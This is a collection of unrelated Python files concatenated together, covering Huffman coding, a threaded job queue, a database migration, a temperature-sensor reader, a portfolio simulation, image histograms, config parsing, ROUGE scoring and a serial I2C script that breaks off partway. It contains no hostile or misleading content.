        return f"{self.ch}=>[ct={self.ct},lt={self.lt},rt={self.rt}]"
def parse_queue_and_get_tree(nq):
    """Collapse a count-sorted queue of Nodes into a single Huffman tree.

    Repeatedly merges the two front nodes into a parent whose count is
    their sum, until one node (the root) remains; that root is returned.
    """
    while nq.qsize() > 1:
        left = nq.get()
        right = nq.get()
        parent = Node(None, left.ct + right.ct)
        parent.lt = left
        parent.rt = right
        nq.put(parent)
    return nq.get()
def build_tree(words):
    """Build a Huffman tree from the character frequencies of *words*.

    Args:
        words: iterable of strings whose characters are counted.

    Returns:
        Node: the root of the Huffman tree, or a Node(None, 0) sentinel
        when *words* contains no characters.
    """
    # Count how often each character occurs across all words.
    # (BUGFIX: removed a leftover debug print of the count dict.)
    ch_dict = dict()
    for word in words:
        for char in word:
            ch_dict[char] = ch_dict.get(char, 0) + 1
    # One leaf per distinct character, sorted by ascending count so the
    # queue merges the rarest symbols first.
    nodes = [Node(char, count) for char, count in ch_dict.items()]
    nodes.sort(key=lambda node: node.ct)
    if not nodes:
        return Node(None, 0)  # empty input: sentinel leaf
    nq = Queue()
    for node in nodes:
        nq.put(node)
    return parse_queue_and_get_tree(nq)
def update_char_map(htree, char_map, hcode=""):
    """Populate *char_map* with the Huffman code of every leaf in *htree*.

    Left edges append "0", right edges append "1".

    Args:
        htree: root Node of a Huffman (sub)tree, or None.
        char_map: dict filled in place with char -> code string.
        hcode: code prefix accumulated on the path from the root.
    """
    if htree is None:
        # BUGFIX: guard against empty subtrees (e.g. the Node(None, 0)
        # sentinel), which previously raised AttributeError.
        return
    if htree.ch is not None:
        # Leaf: record its code. A tree with a single leaf would get the
        # empty (undecodable) code, so fall back to "0" in that case.
        char_map[htree.ch] = hcode or "0"
        return
    update_char_map(htree.lt, char_map, hcode + "0")
    update_char_map(htree.rt, char_map, hcode + "1")
# Tests: build a tree for each word list, derive the code map, print it.
for words in (["cats", "cars", "dogs"], ["cat", "car", "dog"]):
    htree = build_tree(words)
    char_map = dict()
    update_char_map(htree, char_map)
    print(char_map)
|
#!/usr/bin/env python
import os
import sys
# PyInstaller one-file bundles unpack to a temp dir exposed as sys._MEIPASS;
# cd there so bundled data files resolve relative to the cwd.
# NOTE(review): sys._MEIPASS only exists inside a frozen app -- this raises
# AttributeError when run from source.
os.chdir(sys._MEIPASS)
import data6
# Python 2 print statement: show the directory we ended up in.
print os.getcwd()
|
# -*- coding: utf-8 -*-
from .queues import QueueInterruptable, is_main_alive
from .concurrent import Threaded
from .ilogging import logg
from time import sleep
class ActiveQ(QueueInterruptable):
    """A queue that executes its own items on a background thread.

    Items are ``(fun, args, kwargs)`` tuples; each is called and the
    result is optionally forwarded to *resq*. When *jobq* is given, jobs
    are pulled from it whenever this queue is empty.
    """

    def __init__(self, maxsize=256, jobq=None, resq=None):
        self._run_thread = None  # worker thread handle, set by start()
        self._resq = resq  # result q
        self._jobq = jobq  # input q
        super(ActiveQ, self).__init__(maxsize)

    def start(self):
        """Spawn the worker thread running :meth:`_run`; returns self."""
        # assert self._thread is None
        assert self._run_thread is None
        self._run_thread = Threaded(self._run)
        return self

    def _run(self):
        """Worker loop: pop items and execute them until stopped or the
        main thread dies."""
        logg.info('run started')
        while not self.finish and is_main_alive():
            try:
                item = self.get(block=False, timeout=0.01)
            except QueueInterruptable.Empty:
                sleep(0.01)
                if self._jobq:
                    try:
                        item = self._jobq.get(block=False)
                    except StopIteration:
                        logg.info('stop iteration')
                        break
                    except QueueInterruptable.Empty:
                        continue
                    # Requeue: the job is picked up by the next get() above.
                    self.put(item, block=True)
                # BUGFIX: always restart the loop after an Empty miss;
                # previously `item` could be used uninitialized when no
                # job queue was configured.
                continue
            assert isinstance(item, tuple)
            res = self.action(item)
            if self._resq:
                self._resq.put(res, block=True)
        self._run_thread = None

    def action(self, item):
        """
        for overriding
        :param item: (fun, args, kwargs) tuple
        :return: result of fun(*args, **kwargs)
        """
        fun, args, kwargs = item
        return fun(*args, **kwargs)

    def push_job(self, fun, *args, **kwargs):
        """
        put job, blocking until there is room in the queue
        (docstring fixed: this variant uses block=True)
        :param fun:
        :param args:
        :param kwargs:
        :return:
        """
        assert callable(fun)
        return self.put((fun, args, kwargs), block=True)

    def put_job(self, fun, *args, **kwargs):
        """
        put job if possible, non-blocking
        :param fun:
        :param args:
        :param kwargs:
        :return:
        """
        if not args and not kwargs and isinstance(fun, (tuple, list)):
            # ex) q.put_job([fun, args, kwargs])
            fun, args, kwargs = fun
        assert callable(fun)
        return self.put((fun, args, kwargs), block=False)
if __name__ == '__main__':
    # Smoke test: push 10 printing jobs through the queue and wait.
    import sys
    def testfun(i):
        # Flush immediately so output interleaves predictably with the
        # worker thread's output.
        print(i)
        sys.stdout.flush()
        return i
    q = ActiveQ(10).start()
    for i in range(10):
        q.push_job(testfun, i)
    # NOTE(review): busy-wait until the queue drains -- burns CPU; a
    # join()-style wait would be gentler.
    while not q.empty():
        pass
    q.stop()
    print('done')
|
"""empty message
Revision ID: 0a1a1fcb6302
Revises:
Create Date: 2018-05-26 20:35:58.639216
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '0a1a1fcb6302'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Create the ``dish`` table and the ``meal`` table referencing it."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('dish',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=512), nullable=True),
    sa.Column('co2', sa.Integer(), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('meal',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('created', sa.DateTime(), nullable=True),
    sa.Column('recipe', sa.String(length=512), nullable=True),
    sa.Column('picture', sa.String(length=512), nullable=True),
    sa.Column('label', sa.String(length=100), nullable=True),
    sa.Column('dish_id', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['dish_id'], ['dish.id'], ),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('id')
    )
    # ### end Alembic commands ###
def downgrade():
    """Drop the tables in dependency order: ``meal`` first, then ``dish``."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('meal')
    op.drop_table('dish')
    # ### end Alembic commands ###
|
#!/usr/bin/env python
import os
import time
#----------------------------------------------------------------
# Note:
# ds18b20's data pin must be connected to pin7(GPIO4).
#----------------------------------------------------------------
# Reads temperature from sensor and prints to stdout
# id is the id of the sensor
def readSensor(id):
    # Each 1-wire device exposes its reading via /sys/bus/w1/devices/<id>/w1_slave
    tfile = open("/sys/bus/w1/devices/"+id+"/w1_slave")
    text = tfile.read()
    tfile.close()
    # Second line of w1_slave ends in "t=<millidegrees>".
    # NOTE(review): token index 9 assumes the kernel's exact line layout --
    # confirm on the target kernel version.
    secondline = text.split("\n")[1]
    temperaturedata = secondline.split(" ")[9]
    # Strip the leading "t=" and convert millidegrees C to degrees C.
    temperature = float(temperaturedata[2:])
    temperature = temperature / 1000
    print "Sensor: " + id + " - Current temperature : %0.3f C" % temperature
# Reads temperature from all sensors found in /sys/bus/w1/devices/
# starting with "28-...
def readSensors():
    count = 0
    sensor = ""  # NOTE(review): unused variable, left untouched
    # DS18B20 device ids all start with the family code "28-".
    for file in os.listdir("/sys/bus/w1/devices/"):
        if (file.startswith("28-")):
            readSensor(file)
            count+=1
    if (count == 0):
        print "No sensor found! Check connection"
# read temperature every second for all connected sensors
def loop():
    # Poll every connected sensor once per second, forever.
    while True:
        readSensors()
        time.sleep(1)
# Nothing to cleanup
def destroy():
    # Cleanup hook invoked on Ctrl-C; this sensor needs no teardown.
    pass
# Main starts here
if __name__ == "__main__":
    try:
        loop()
    except KeyboardInterrupt:
        # Ctrl-C: run the (empty) cleanup hook and exit quietly.
        destroy()
|
import numpy as np
import matplotlib.pyplot as plt
from distributionally_robust_portfolio import *
from SimSet2 import *
class SimSet3(DistributionallyRobustPortfolio):
    """Simulation set 3: distributionally robust portfolio whose
    Wasserstein radius is selected by the bootstrap/holdout method, then
    evaluated out of sample."""

    # Number of assets in the portfolio.
    m = 10
    # Candidate Wasserstein radii: {1..9} x 10^i for i in {-3, -2, -1}.
    eps_range = np.concatenate([np.arange(1, 10)*10.0**(i)
                                for i in range(-3, 0)])
    # Large validation sample for out-of-sample performance estimates.
    valids = normal_returns(10, 2*10**5)

    def __init__(self, beta, N, k=50):
        # Number of resamples
        self.k = k
        # Reliability threshold
        self.beta = beta
        # Instantiate Fusion model
        super().__init__(SimSet3.m, N)

    def bootstrap(self, data_sets):
        '''
        Method to iterate over a list of independent datasets via the iter_data
        generator method so as to apply the bootstrap technique to each dataset
        and then save the results.
        '''
        self.perf, self.cert, radii = zip(*self.iter_data(data_sets))
        # Fraction of datasets whose certificate bounded true performance.
        self.rel = np.mean(np.array(self.perf) <= np.array(self.cert), axis=0)
        self.radii = np.mean(radii, axis=0)

    def simulate(self, data):
        '''
        Method called within the iter_data generator.
        Returns
            out_perf: out-of-sample performance calculated with validation data
            cert: performance certificate (optimal objective for M)
            eps_btstrp: radius selected from holdout method
        '''
        # List to store reliability
        rel = []
        # Perform k resamples
        for i in range(self.k):
            # Split data into test and train
            train, self.test = train_test_split(data, test_size=1/3)
            # Resample train data up-to size N
            train = resample(train, n_samples=self.N)
            # Set TrainData parameter to train
            self.dat.setValue(train)
            # Iterate through a range of Wasserstein radii
            rel.append(self.iter_radius(SimSet3.eps_range))
        # Sum reliability over all resamples (for each epsilon)
        rel = np.sum(rel, axis=0)
        # Smallest radius that has reliability over 1-beta
        _id = next(i for i, r in enumerate(rel) if r >= self.k*(1-self.beta))
        eps_btstrp = SimSet3.eps_range[_id]
        # Set TrainData parameter to data
        self.dat.setValue(data)
        # Set WasRadius parameter to eps_btstrp
        self.eps.setValue(eps_btstrp)
        self.M.solve()
        # Out-of-sample performance for x_N(eps_btstrp)
        out_perf = self.sample_average(
            self.x.level(), self.t.level(), SimSet3.valids)
        cert = self.M.primalObjValue()
        return out_perf, cert, eps_btstrp

    def solve(self, epsilon):
        '''
        Method called within the iter_radius generator.
        Returns
            reliability: SAA of out-of-sample performance <= certificate(epsilon)
        '''
        # Set WasRadius parameter to epsilon and solve
        self.eps.setValue(epsilon)
        self.M.solve()
        # Calculate out-of-sample performance SAA estimator using test
        saa = self.sample_average(self.x.level(), self.t.level(), self.test)
        # Boolean to state if the certificate is greater than SAA estimate
        return saa <= self.M.primalObjValue()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# java2python -> top-level package marker.
|
import os
import numpy as np
import matplotlib.pyplot as plt
# Directory containing this script, used to resolve the demo image path.
THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))
# Demo input image, loaded at import time for the driver code below.
ejemplo = plt.imread(THIS_FOLDER + "/img/vignetting.jpg")
def histograma(img):
    """Compute and plot the histogram of an RGB image.

    Args:
        img (Numpy array 3d): An RGB image.

    Returns:
        List: a list with the histogram array of each RGB channel. Each
        entry is a 2-row array: the first row holds the intensities
        present in the channel and the second their pixel counts.
    """
    # General figure configuration
    plt.figure(4, figsize=(7, 7))
    plt.suptitle('Histograma RGB', fontsize=30)
    # List where each channel's histogram is stored
    lista = []
    # Compute and display the 3 RGB channels of the input image.
    for c in range(img.shape[2]):
        # Compute the histogram via the unique intensities and their counts
        vector = img[:, :, c].flatten()
        unique, counts = np.unique(vector, return_counts=True)
        lista.append(np.asarray((unique, counts)))
        # Per-channel subplot configuration
        plt.subplot(3, 1, c + 1)
        plt.xlim(0, 255)
        plt.ylim(0, np.max(lista[c][1]) + 50)
        # Channel-specific plot colour and labels
        if c == 0:
            plt.plot(lista[c][0], lista[c][1], color='r')
            plt.title('Canal Rojo')
        elif c == 1:
            plt.plot(lista[c][0], lista[c][1], color='g')
            plt.title('Canal Verde')
            plt.ylabel('Nº pixeles')
        elif c == 2:
            plt.plot(lista[c][0], lista[c][1], color='b')
            plt.title('Canal Azul')
            plt.xlabel('Intensidad')
    plt.tight_layout()
    return lista
def histograma_acumulado(img, bins):
    """Equalize the input image using its cumulative histogram.

    Args:
        img (numpy array): Input image array; pixel values index the
            histogram, so integer intensities in [0, bins) are assumed
            -- TODO confirm dtype with callers.
        bins (int): Number of intensity levels of the input image.

    Returns:
        Numpy array: the input image after histogram equalization,
        reshaped to the original shape.
    """
    flat = img.flatten()
    plt.figure(1)
    plt.hist(flat, bins=50)
    # Compute the intensity histogram
    histogram = np.zeros(bins)
    for pixel in flat:
        histogram[pixel] += 1
    # Cumulative histogram (running sum of the counts)
    histogram = iter(histogram)
    histogram_acum = [next(histogram)]
    for i in histogram:
        histogram_acum.append(histogram_acum[-1] + i)
    histogram_acum = np.array(histogram_acum)
    # Normalize the cumulative histogram to the 0-255 range
    nj = (histogram_acum - histogram_acum.min()) * 255
    N = histogram_acum.max() - histogram_acum.min()
    histogram_acum = (nj / N).astype('uint8')
    plt.figure(2)
    plt.plot(histogram_acum)
    # Map every pixel through the normalized cumulative histogram
    img_final = histogram_acum[flat]
    # Restore the original image shape
    img_final = np.reshape(img_final, img.shape)
    return img_final
# Demo driver: equalize the sample image, plot its histograms, and show
# the equalized and original images side by side in separate figures.
img_final = histograma_acumulado(ejemplo, 256)
plt.figure(3)
plt.imshow(img_final)
histograma(ejemplo)
plt.figure(5)
plt.imshow(ejemplo)
plt.show()
|
# Create By : Yogesh Kothiya
# Uses : Manage Role
from flask import jsonify, request
import socket
import apis.utils.constants as CONST
from datetime import datetime, date, time, timedelta
import pymongo
from database import DB
import json
from bson import json_util, ObjectId
class crads:
    """Role-management helper: holds request context (user/vendor) and the
    Mongo collection names used by the role/module-access admin APIs.

    NOTE(review): lowercase class name kept -- renaming would break callers.
    """
    def __init__(self,vendor_id=None,userId=None):
        # Timestamp captured at construction time (server-local time).
        self.todayDate = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        # NOTE(review): gethostbyname(gethostname()) may resolve to
        # 127.0.0.1 depending on /etc/hosts -- confirm intended address.
        self.ip_address = socket.gethostbyname(socket.gethostname())
        self.user_id = userId
        self.vendor_id = vendor_id
        # Mongo collection names used by this class.
        self.tbl_v005_roles = "v005_roles"
        self.tbl_v018_module_access = "v018_module_access"
        self.tbl_v017_modules = "v017_modules"
        self.tbl_a011_settings = "a011_settings"
    def adminContact(self):
        # Fetch the admin contact record from the settings collection,
        # projecting only the public contact fields (no _id).
        adminData = DB.find_one(self.tbl_a011_settings, {"setting_for":"admin_contact"},{"_id":0,"name":1,"email":1,"mobile":1,"address":1})
        return adminData
|
"""Command Line Parser realated functions.
One function creates the parser.
Another function allows hybird usage of:
- a yaml file with predefined parameters
and
- user inputted parameters through the command line.
"""
import argparse
import yaml
def create_parser():
    """Creates a parser with all the variables that can be edited by the user.

    Returns:
        parser: a parser for the command line
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--config-file", dest="config_file", type=argparse.FileType(mode="r"))
    # All remaining options default to None so parse_config() can tell
    # which ones the user set explicitly on the command line.
    # (flag, extra add_argument kwargs), in registration order.
    option_specs = [
        ("--pooling_class", {"type": str}),
        ("--n_pixels", {"type": int}),
        ("--depth", {"type": int}),
        ("--laplacian_type", {"type": str}),
        ("--type", {"type": str}),
        ("--sequence_length", {"type": int}),
        ("--prediction_shift", {"type": int}),
        ("--partition", {"nargs": "+"}),
        ("--batch_size", {"type": int}),
        ("--learning_rate", {"type": float}),
        ("--n_epochs", {"type": int}),
        ("--kernel_size", {"type": int}),
        ("--path_to_data", {}),
        ("--model_save_path", {}),
        ("--tensorboard_path", {}),
        ("--download", {"type": bool}),
        ("--means_path", {}),
        ("--stds_path", {}),
        ("--seed", {"type": int}),
        ("--reducelronplateau_mode", {}),
        ("--reducelronplateau_factor", {"type": float}),
        ("--reducelronplateau_patience", {"type": int}),
        ("--steplr_step_size", {"type": int}),
        ("--steplr_gamma", {"type": float}),
        ("--warmuplr_warmup_start_value", {"type": float}),
        ("--warmuplr_warmup_end_value", {"type": float}),
        ("--warmuplr_warmup_duration", {"type": int}),
        ("--earlystopping_patience", {"type": int}),
    ]
    for flag, extra in option_specs:
        parser.add_argument(flag, default=None, **extra)
    parser.add_argument("--gpu", dest="device", nargs="*")
    return parser
def parse_config(parser):
    """Parse command-line args and merge in values from the YAML config file.

    Values given on the command line take precedence; the YAML file only
    fills in arguments that are still ``None``.  After merging, every
    argument except the optional ones must have a value.

    Args:
        parser (argparse.ArgumentParser): parser whose parsed arguments are
            merged with the YAML file given via --config-file (if any).

    Raises:
        ValueError: if any required argument is still None after merging.

    Returns:
        argparse.Namespace: the fully populated arguments.
    """
    # these may legitimately stay None
    optional_keys = {"device", "type", "sequence_length", "prediction_shift"}
    args = parser.parse_args()
    arg_dict = vars(args)
    if args.config_file:
        data = yaml.load(args.config_file, Loader=yaml.FullLoader)
        delattr(args, "config_file")
        arg_dict = vars(args)
        for key, value in data.items():
            # add only those not specified by the user through command line
            if isinstance(value, dict):
                for tag, element in value.items():
                    if arg_dict[tag] is None:
                        arg_dict[tag] = element
            elif arg_dict[key] is None:
                arg_dict[key] = value
    for key, value in arg_dict.items():
        if key not in optional_keys and value is None:
            raise ValueError("The value of {} is set to None. Please define it in the config yaml file or in the command line.".format(key))
    return args
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from retrieval_rs.metric import rouge_score as rouge_score
import sys
import os
SR_DIR = os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, os.pardir))
sys.path.insert(0, SR_DIR)
class Rouge:
    """ROUGE-1/2/3/L scorer over raw hypothesis/reference texts."""
    DEFAULT_METRICS = ["rouge-1", "rouge-2", "rouge-3", "rouge-L"]
    AVAILABLE_METRICS = {
        "rouge-1": lambda hyp, ref: rouge_score.rouge_n(hyp, ref, 1),
        "rouge-2": lambda hyp, ref: rouge_score.rouge_n(hyp, ref, 2),
        "rouge-3": lambda hyp, ref: rouge_score.rouge_n(hyp, ref, 3),
        "rouge-L": lambda hyp, ref:
        rouge_score.rouge_l_summary_level(hyp, ref),
    }
    DEFAULT_STATS = ["f", "p", "r"]
    AVAILABLE_STATS = ["f", "p", "r"]

    def __init__(self, metrics=None, stats=None):
        """Select metrics and statistics to report.

        Arguments:
            metrics: iterable of metric names (case-insensitive), subset of
                AVAILABLE_METRICS; defaults to DEFAULT_METRICS.
            stats: iterable of stats ("f", "p", "r"); defaults to all three.

        Raises:
            ValueError: on an unknown metric or stat name.
        """
        if metrics is not None:
            # BUGFIX: lowering the name used to make "rouge-L" unreachable
            # (the canonical key has an upper-case L); map case-insensitive
            # input back to the canonical key instead.
            canonical = {k.lower(): k for k in Rouge.AVAILABLE_METRICS}
            self.metrics = []
            for m in metrics:
                key = canonical.get(m.lower())
                if key is None:
                    raise ValueError("Unknown metric '%s'" % m)
                self.metrics.append(key)
        else:
            self.metrics = Rouge.DEFAULT_METRICS
        if stats is not None:
            self.stats = [s.lower() for s in stats]
            for s in self.stats:
                if s not in Rouge.AVAILABLE_STATS:
                    raise ValueError("Unknown stat '%s'" % s)
        else:
            self.stats = Rouge.DEFAULT_STATS

    @staticmethod
    def _to_sentences(text):
        """Split raw text into whitespace-normalized sentences on '.'.

        Returns the text unchanged when it contains no non-empty fragment
        (e.g. it is only dots) — MZ's workaround for dot-only inputs.
        """
        sents = [sent for sent in text.split('.') if len(sent) > 0]
        if len(sents) > 0:
            return [" ".join(s.split()) for s in sents]
        return text

    def get_scores(self, hyps, refs, avg=False, ignore_empty=False):
        """
        calculate the rouge score of each pair of hyps and refs
        :param hyps: a raw text of predicted response
        :param refs: a raw text of golden response
        :param avg: average
        :param ignore_empty: Filter out hyps of 0 length
        :return: rouge score
        """
        if isinstance(hyps, str):
            hyps, refs = [hyps], [refs]
        if ignore_empty:
            # Filter out hyps of 0 length
            hyps_and_refs = zip(hyps, refs)
            hyps_and_refs = [_ for _ in hyps_and_refs if len(_[0]) > 0]
            hyps, refs = zip(*hyps_and_refs)
        assert(type(hyps) == type(refs))
        assert(len(hyps) == len(refs))
        if not avg:
            return self._get_scores(hyps, refs)
        return self._get_avg_scores(hyps, refs)

    def _get_scores(self, hyps, refs):
        """Per-pair scores: list of {metric: {stat: value}} dicts."""
        scores = []
        for hyp, ref in zip(hyps, refs):
            # shared sentence preprocessing (was duplicated inline here
            # and in _get_avg_scores)
            hyp = self._to_sentences(hyp)
            ref = self._to_sentences(ref)
            sen_score = {}
            for m in self.metrics:
                fn = Rouge.AVAILABLE_METRICS[m]
                sc = fn(hyp, ref)
                sen_score[m] = {s: sc[s] for s in self.stats}
            scores.append(sen_score)
        return scores

    def _get_avg_scores(self, hyps, refs):
        """Corpus-average scores: {metric: {stat: mean value}}."""
        scores = {m: {s: 0 for s in self.stats} for m in self.metrics}
        count = 0
        for hyp, ref in zip(hyps, refs):
            hyp = self._to_sentences(hyp)
            ref = self._to_sentences(ref)
            for m in self.metrics:
                fn = Rouge.AVAILABLE_METRICS[m]
                sc = fn(hyp, ref)
                scores[m] = {s: scores[m][s] + sc[s] for s in self.stats}
            count += 1
        scores = {m: {s: scores[m][s] / count for s in scores[m]}
                  for m in scores}
        return scores
|
import unittest
from pathlib import Path
from tempfile import TemporaryDirectory
from wrk2img import ImageGenerator
class TestImageGenerator(unittest.TestCase):
    """Smoke tests for ImageGenerator: plot creation and PNG export."""

    def setUp(self):
        self.image_generator = ImageGenerator()

    def test_generate_image(self):
        # one throughput series mapping percentile -> latency (seconds)
        percentiles = {
            '748868.53 req/s': {
                50: 250e-6,
                75: 491e-6,
                90: 700e-6,
                99: 5.8e-3,
            }
        }
        image = self.image_generator.generate_image(percentiles, "localhost")
        self.assertIsNotNone(image)
        # TODO: write some assert
        with TemporaryDirectory(dir='.') as tempdir:
            target = Path(tempdir).resolve().joinpath('output.png')
            self.image_generator.save_image(image, target)
            self.assertTrue(target.exists())
if __name__ == '__main__':
unittest.main()
|
from project.card.card import Card
class CardRepository:
    """In-memory collection of Card objects, unique by name."""

    def __init__(self):
        self.cards = []

    @property
    def count(self):
        """Number of cards currently stored."""
        return len(self.cards)

    def add(self, card: Card):
        """Append a card; raise ValueError if the name is already taken."""
        if any(existing.name == card.name for existing in self.cards):
            raise ValueError(f"Card {card.name} already exists!")
        self.cards.append(card)

    def remove(self, card_name: str):
        """Remove the card with the given (non-empty) name."""
        if card_name == "":
            raise ValueError("Card cannot be an empty string!")
        self.cards.remove(self.find(card_name))

    def find(self, name: str):
        """Return the first card whose name matches `name`."""
        matches = [c for c in self.cards if c.name == name]
        return matches[0]
|
#!/usr/bin/env python
###############################################################
# < next few lines under version control, D O N O T E D I T >
# $Date$
# $Revision$
# $Author$
# $Id$
###############################################################
###############################################################
# test_localization.py - test effect of localization on static
# and flow-dependent covariance.
# Currently implements the following:
# Lorenc 2003 Schur operator method
# Buehner 2005 method
# Liu et al. 2009 method (buggy)
###############################################################
###############################################################
__author__ = "Rahul Mahajan"
__email__ = "rahul.mahajan@nasa.gov"
__copyright__ = "Copyright 2012, NASA / GSFC / GMAO"
__license__ = "GPL"
__status__ = "Prototype"
###############################################################
###############################################################
import sys
import numpy as np
from matplotlib import pyplot
from module_DA import *
from module_IO import *
from plot_stats import plot_cov
###############################################################
###############################################################
def main():
    """Compare static and flow-dependent covariance localization schemes.

    Reads the hybrid-DA diagnostic file, builds the static (Bs) and
    ensemble (Be) covariances, applies Schur (Lorenc 2003), Buehner (2005)
    and Liu et al. (2009) localization, and plots the matrices and their
    differences.
    """
    fdiag = 'L96_hybDA_diag.nc4'
    [model, DA, ensDA, varDA] = read_diag_info(fdiag)
    # hybrid runs carry extra diagnostic fields in the file
    if DA.do_hybrid:
        [_, Xb, _, _, _, _, _, _, _, _] = read_diag(fdiag, 0)
    else:
        [_, Xb, _, _, _, _, _] = read_diag(fdiag, 0)
    # ensemble perturbations (Ndof x Nens) and transposed ensemble
    Xbp = np.transpose(Xb - np.mean(Xb,axis=0))
    Xb = np.transpose(Xb)
    Bs = read_clim_cov(model=model)
    Be = np.cov(Xb,ddof=1)
    # localization matrix L and its elementwise square root L2
    L = np.ones((model.Ndof,model.Ndof))
    L2 = np.ones((model.Ndof,model.Ndof))
    for i in range(0,model.Ndof):
        for j in range(0,model.Ndof):
            # cyclic distance on the model ring, normalized by Ndof
            # (builtin float: np.float was removed in numpy >= 1.20)
            dist = float(np.abs(i - j)) / model.Ndof
            if ( dist > 0.5 ): dist = 1.0 - dist
            cov_factor = compute_cov_factor(dist, ensDA.localization)
            L[i,j] = cov_factor
            L2[i,j] = np.sqrt(cov_factor)
            # print() form works on both Python 2 and 3 (the original used
            # a Python-2-only print statement)
            print('i = %2d, j = %2d, d = %5.3f, c = %10.8f, c = %10.8f' % (i, j, dist, L[i,j], L2[i,j]))
    # modulated ensembles for the Buehner and Liu constructions
    XbpLb = np.zeros((model.Ndof,model.Ndof*ensDA.Nens))
    XbpLl = np.zeros((model.Ndof,model.Ndof*ensDA.Nens))
    for i in range(0,ensDA.Nens):
        start = i*model.Ndof
        end = i*model.Ndof + model.Ndof
        XbpLb[:,start:end] = np.dot(np.diag(Xbp[:,i]),L2) / np.sqrt(ensDA.Nens-1)
        XbpLl[:,start:end] = L2 * np.repeat(np.transpose(np.matrix(Xbp[:,i])),model.Ndof,axis=1) / np.sqrt(ensDA.Nens-1)
    Be_Lb = np.dot(XbpLb,np.transpose(XbpLb))
    Be_Ll = np.dot(XbpLl,np.transpose(XbpLl))
    # raw strings keep the identical title text while avoiding invalid
    # \-escape warnings on Python 3
    fig1 = plot_cov(Bs, title=r"Static : $\mathbf{B}_s$")
    fig2 = plot_cov(Be, title=r"Ensemble : $\mathbf{B}_e$")
    fig3 = plot_cov(Bs*L, title=r"Static Schur : $\mathbf{B}_s \circ\ \mathbf{L}$")
    fig4 = plot_cov(Be*L, title=r"Ensemble Schur : $\mathbf{B}_e \circ\ \mathbf{L}$")
    fig5 = plot_cov(Be_Lb, title=r"Ensemble Buehner : $[\mathbf{X}^'_b \mathbf{L}] [\mathbf{X}^'_b \mathbf{L}]^{T}$")
    fig6 = plot_cov(Be_Ll, title="Ensemble Liu")
    fig7 = plot_cov(Bs-Bs*L, title="Difference Static - Static Schur")
    fig8 = plot_cov(Be-Be*L, title="Difference Ensemble - Ensemble Schur")
    fig9 = plot_cov(Be-Be_Lb, title="Difference Ensemble - Ensemble Buehner")
    fig10 = plot_cov(Be-Be_Ll, title="Difference Ensemble - Ensemble Liu")
    fig11 = plot_cov(Be*L-Be_Lb, title="Difference Ensemble Schur - Ensemble Buehner")
    fig12 = plot_cov(Be*L-Be_Ll, title="Difference Ensemble Schur - Ensemble Liu")
    fig13 = plot_cov(Be_Lb-Be_Ll, title="Difference Ensemble Buehner - Ensemble Liu")
    pyplot.show()
    sys.exit(0)
###############################################################
###############################################################
if __name__ == "__main__": main()
###############################################################
|
# in iPython:
# %run -i i2c.py
# the -i means use existing global variables; in particular: ser
# (otherwise, we end up with multiple open serial connections and it gets ugly)
import sys
import os
import re
import serial
import time
from math import ceil
from functools import reduce
from itertools import chain
# Bail out early when no serial port was given on the command line.
if len(sys.argv) < 2:
    print("Please specify a serial port as the first argument.", file=sys.stderr)
    # exit with a non-zero status so callers can detect the failure
    # (a bare exit() would exit with status 0)
    sys.exit(1)
ser_port = sys.argv[1]
class CommunicationsError(Exception):
    """Raised when the serial protocol returns an unexpected response."""
def init_ser():
    """Open (or reuse) the serial link and parse the firmware map file.

    Populates the module-level `mapped_variables` dict (name -> RAM
    address) and the module-level `ser` serial handle; reusing an already
    open `ser` avoids re-resetting the board (see header note on `-i`).
    """
    global mapped_variables
    mapfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'esc_test.map')
    mapfile_lines = open(mapfile, 'r').readlines()
    # map addresses live in the 0x800000+ data space; subtract the offset
    # to get the RAM address the bridge protocol expects
    mapped_variables = dict([(m.group(2), int(m.group(1), 0) - 0x800000) for s in mapfile_lines for m in [
        re.search('(0x00000000008[0-9a-fA-F]+)\s*([a-zA-Z_]\w+)', s)] if m])
    global ser
    is_defined = 'ser' in globals() # see comment at top
    is_open = is_defined and ser.isOpen()
    min_ser_timeout = 0.010 # less than 10ms and we're going too quickly
    if not is_open:
        if not is_defined:
            ser = serial.Serial(ser_port, 115200, timeout=0.01)
        else:
            ser.open()
        # give the serial interface a bit of time to return data received _before_ the Arduino
        # reset that we just caused by opening up the serial interface that is connected to
        # the auto-reset circuit
        time.sleep(.1)
        ser.flushInput()
        # now wait a max of one second for the initial serial dump from the Arduino; once we
        # get a single byte, we can just eat up the rest and be done
        for i in range(0,100):
            by = ser.read(1)
            if len(by) == 0:
                time.sleep(.01)
            else:
                ser.read(100)
                break
    write('-Vb') # turn verbose off and binary on
    if ser.timeout < min_ser_timeout:
        print("adjusting ser.timeout from %.3f to %.3f" % (ser.timeout, min_ser_timeout))
    ser.timeout = max(ser.timeout, min_ser_timeout)
[Ap, An, Bp, Bn, Cp, Cn, sense_common] = map(lambda n: 2**n, [0,1,2,3,4,5,6])
class serial_twi_bridge:
    """Protocol limits of the serial<->TWI bridge firmware."""
    # largest chunk a single read command may request from the device
    MAX_READ_BYTES = 0x20
class mcu:
    """ATmega CPU/ADC timing constants (namespace-style; never instantiated)."""
    F_CPU = 16e6
    ADC_PRESCALAR = [2, 2, 4, 8, 16, 32, 64, 128] # probably common to all ATmegas
    ADC_CYCLES_PER_SAMPLE = 13 # strictly speaking the first is 25 but we don't care
    def adc_sample_time(prescalar):
        """Seconds per ADC sample for the given prescalar index."""
        divider = mcu.ADC_PRESCALAR[prescalar]
        return divider / mcu.F_CPU * mcu.ADC_CYCLES_PER_SAMPLE
    class MCUCSR:
        """Bit positions of the reset-cause flags in the MCU status register."""
        WDRF = 3
        BORF = 2
        EXTRF = 1
        PORF = 0
class config:
    """ADC capture configuration and device control.

